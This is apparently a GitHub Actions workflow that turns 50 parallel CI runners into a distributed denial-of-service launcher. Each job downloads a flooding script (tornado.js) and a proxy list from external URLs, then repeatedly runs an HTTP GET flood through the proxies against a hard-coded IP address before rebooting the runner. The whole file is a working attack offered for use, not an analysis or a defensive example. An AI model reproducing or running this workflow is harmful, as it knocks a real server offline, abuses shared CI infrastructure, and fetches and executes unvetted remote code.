name: Ubuntu VDS 50 saniye tornad

on:
  workflow_dispatch:

jobs:
  vds:
    runs-on: ubuntu-latest
    strategy:
      max-parallel: 50
      matrix:
        instance: [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50]


    steps:
      - name: OK !
        run: |
          wget https://github.com/kaneious/tornado/raw/refs/heads/main/tornado.js
          wget https://curl.by/3fd1E/proxies.txt
          npm i hpack
          chmod +x tornado.js
          PIDS=()
          for i in {1..4}; do
            timeout 50 node tornado.js GET http://46.174.48.103/ 50 8 90 proxies.txt --full --query 3
            PIDS+=($!)
          done
          
          for pid in "${PIDS[@]}"; do
            wait $pid
          done

      - name: OK !
        run: sleep 50
        
      - name: OK !
        run: sudo reboot
